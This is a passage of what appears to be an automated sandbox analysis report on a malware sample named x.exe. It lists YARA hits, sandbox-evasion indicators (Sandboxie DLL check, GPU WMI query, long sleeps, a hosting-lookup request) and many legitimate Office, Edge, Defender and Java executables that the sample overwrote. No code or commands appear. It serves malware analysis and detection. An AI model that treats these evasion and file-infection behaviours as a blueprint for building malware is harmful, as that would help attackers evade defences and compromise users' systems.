                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: x.exe, type: SAMPLE
Source: Yara match File source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x.exe PID: 5336, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: x.exe, 00000002.00000002.2471076189.0000000003001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: x.exe Binary or memory string: SBIEDLL.DLLINFO
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe Memory allocated: 1610000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe Memory allocated: 1B000000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe Window / User API: threadDelayed 731
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe Window / User API: threadDelayed 9039
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2715
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3568
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3965
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6259
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 851
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\X86\MpCmdRun.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCopyAccelerator.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\ConfigSecurityPolicy.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDefenderCoreService.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Users\user\Desktop\x.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\mpextms.exe
Source: C:\Windows\svchost.com Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\NisSrv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDlpCmd.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                              Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
